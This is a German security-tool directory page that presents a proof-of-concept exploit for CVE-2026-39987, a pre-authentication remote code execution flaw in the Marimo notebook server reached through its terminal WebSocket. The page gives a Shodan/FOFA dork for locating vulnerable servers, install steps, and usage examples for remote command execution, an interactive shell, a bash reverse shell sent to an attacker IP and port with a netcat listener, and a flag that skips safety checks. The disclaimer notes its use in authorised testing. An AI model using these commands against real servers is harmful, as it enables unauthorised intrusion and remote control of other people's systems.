Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Tools/GitHubGitHub/m3ph1569/cve-2026-39987-poc
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsCommand and ControlRemote-Access-Tool
GitHubm3ph1569/cve-2026-39987-poc

CVE-2026-39987-POC

CVE-2026-39987 Exploit-Tool - Marimo < 0.23.0 Pre-Auth RCE (WebSocket)

Repository anzeigen
21vor 1 MonatNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2026-39987 - Marimo < 0.23.0 Pre-Auth RCE (WebSocket)

CVSS Severity Python License

Proof-of-Concept (PoC)-Exploit für eine kritische Pre-Authentifizierungs-Remote-Code-Ausführungs-Sicherheitslücke (RCE) in Marimo-Versionen vor 0.23.0.

Die Sicherheitslücke ermöglicht es einem nicht authentifizierten Angreifer, sich mit dem WebSocket-Endpunkt (/terminal/ws) zu verbinden und beliebige Systembefehle auf dem Zielserver auszuführen.

Funktionen

  • Automatische Überprüfung: Überprüft automatisch das Ziel auf die Sicherheitslücke, indem die Version identifiziert und das Vorhandensein der Marimo-Anwendung (über favicon und /api/version-Endpunkte) verifiziert wird.
  • Einzelbefehlsausführung: Senden Sie einen einzelnen Befehl an das Ziel und erhalten Sie die Ausgabe.
  • Interaktive Shell: Starten Sie eine pseudo-interaktive persistente Shell für eine nahtlose Interaktion mit dem Ziel.
  • Reverse-Shell-Generierung: Integrierte Unterstützung zum Generieren und Ausführen von Reverse-Shell-Payloads.
  • Prüfungsumgehung: Möglichkeit, die Versions- und Vorhandenseinsprüfungen mit dem Flag --no-check zu umgehen, für Umgebungen, in denen Endpunkte verdeckt sein könnten.
  • Shodan / FOFA Dork

    Sie können folgenden Dork verwenden, um potenziell anfällige Instanzen zu identifizieren:

    root@kitploit:~
    http.favicon.hash:-1864630356
    

    Installation

    Es wird empfohlen, eine Python-Virtual-Environment zu verwenden, um die Abhängigkeiten zu installieren.

    root@kitploit:~
    # 1. Repository klonen
    git clone https://github.com/M3PH1569/CVE-2026-39987-POC.git
    cd CVE-2026-39987-POC
    
    # 2. Virtual-Environment erstellen und aktivieren
    python -m venv .CVE-2026-39987
    
    # Windows
    .CVE-2026-39987\Scripts\activate
    # Linux/macOS
    source .CVE-2026-39987/bin/activate
    
    # 3. Pip aktualisieren und erforderliche Abhängigkeiten installieren
    # Windows
    py pip install --upgrade pip ; pip install -r requirements.txt
    # Linux/MacOS
    python3 pip install --upgrade pip && pip install -r requirements.txt
    

    Verwendung

    root@kitploit:~
    usage: CVE-2026-39987.py [-h] [-i] [--revshell IP PORT] [--ping-interval SEC] [--ping-timeout SEC] [--no-ping] [--max-retries N] [--no-reconnect] [--no-check] target [command]
    
    positional arguments:
      target               Target URL (e.g. http://localhost:8080)
      command              Command to execute (omit when using -i)
    
    options:
      -h, --help           show this help message and exit
      --no-check           Skip vulnerability version check
    
    Execution modes:
      -i, --interactive    Interactive shell mode
      --revshell IP PORT   Generate & send a bash reverse shell payload
    
    WebSocket tuning:
      --ping-interval SEC  WebSocket ping interval in seconds (default: 30, more frequent for stability)
      --ping-timeout SEC   WebSocket ping timeout in seconds (default: 300, increased from 120 for slow servers)
      --no-ping            Disable WebSocket ping/pong entirely (recommended if still disconnect)
    
    Reconnect options:
      --max-retries N      Max auto-reconnect attempts (default: 5)
      --no-reconnect       Disable auto-reconnect on unexpected disconnect
    

    Beispiele

    1. Einzelnen Befehl ausführen:

    root@kitploit:~
    python CVE-2026-39987.py http://target.com:8080 "id"
    

    2. Interaktive Shell starten:

    root@kitploit:~
    python CVE-2026-39987.py http://target.com:8080 -i
    

    3. Reverse-Shell ausführen: Stellen Sie sicher, dass auf Ihrem Rechner ein netcat-Listener läuft (z. B. nc -lvnp 4444).

    root@kitploit:~
    python CVE-2026-39987.py http://target.com:8080 --revshell 10.0.0.1 4444
    

    4. Überprüfungen überspringen und Ausführung erzwingen:

    root@kitploit:~
    python CVE-2026-39987.py http://target.com:8080 "whoami" --no-check
    

    Mitwirken

    Beiträge sind willkommen! Bitte zögern Sie nicht, einen Pull Request zu erstellen.

    1. Repository forken
    2. Ihren Feature-Branch erstellen (git checkout -b feature/update-feature)
    3. Ihre Änderungen committen (git commit -m 'Add update feature')
    4. Auf den Branch pushen (git push origin feature/update-feature)
    5. Einen Pull Request öffnen

    Haftungsausschluss

    Dieses Tool dient ausschließlich zu Bildungszwecken und autorisiertem ethischen Hacking. Der Autor übernimmt keine Verantwortung für Missbrauch, Schäden oder illegale Aktivitäten, die durch dieses Skript verursacht werden. Stellen Sie stets sicher, dass Sie die ausdrückliche Genehmigung des Systembesitzers haben, bevor Sie Sicherheitstests durchführen. Die unbefugte Nutzung dieses Skripts ist illegal und strafbar.

    Lizenz

    Dieses Projekt ist unter der MIT-Lizenz lizenziert – siehe die LICENSE-Datei für Details.


    Mit ☕︎ erstellt von M3PH1569
    Tool herunterladen